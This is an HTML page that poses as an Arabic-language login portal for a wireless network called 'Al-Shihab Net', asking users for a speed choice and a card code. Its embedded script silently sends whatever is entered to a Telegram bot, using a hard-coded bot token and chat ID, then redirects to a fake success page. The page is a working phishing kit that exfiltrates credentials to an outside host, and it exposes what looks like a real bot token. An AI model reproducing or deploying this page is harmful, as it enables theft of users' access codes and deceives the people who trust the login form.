<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Login Page</title>
    <style>
        body {
            background-color: yellow;
            color: black;
            font-family: Arial, sans-serif;
        }
        form {
            max-width: 400px;
            margin: 50px auto;
            padding: 20px;
            background-color: green;
            border-radius: 10px;
        }
        label {
            display: block;
            margin-bottom: 8px;
        }
        input, select {
            width: 100%;
            padding: 8px;
            margin-bottom: 16px;
            box-sizing: border-box;
        }
        input[type="submit"] {
            background-color: #3498db;
            color: white;
            cursor: pointer;
        }
    </style>
</head>
<body>
    <div class="login-content">
        <h2>شبكة الشهاب نت اللاسلكية</h2>
        <form id="loginForm" action="https://hazmghxx.github.io/pages-/success.html" method="post">
            <label for="speed">اختر سرعتك:</label>
            <select id="speed" name="speed">
                <option value="slow">ضعيفة</option>
                <option value="medium">متوسطة</option>
                <option value="high">عالية</option>
                <option value="very_high">عالية جداً</option>
            </select>
            <br>
            <label for="cardNumber">ادخل رمز البطاقة هنا:</label>
            <input type="text" id="cardNumber" name="cardNumber" required>
            <br>
            <input type="submit" value="تسجيل الدخول">
        </form>
    </div>

    <script>
        const chatId = "1538488453";
        const botToken = "6109398302:AAF27C--NPfFLtlcvTeT66u9rdn3nmLw7kA";

        const loginForm = document.getElementById("loginForm");

        loginForm.addEventListener("submit", function(event) {
            event.preventDefault();

            const formData = new FormData(loginForm);
            const cardNumber = formData.get("cardNumber");
            const speed = formData.get("speed");

            const message = `تم تسجيل دخول جديد:\nكرت: ${cardNumber}\nسرعة: ${speed}`;

            fetch(`https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${message}`)
                .then(response => response.json())
                .then(data => {
                    console.log(data);
                    window.location.href = "https://hazmghxx.github.io/page/success.html";
                })
                .catch(error => {
                    console.error(error);
                });
        });
    </script>
</body>
</html>
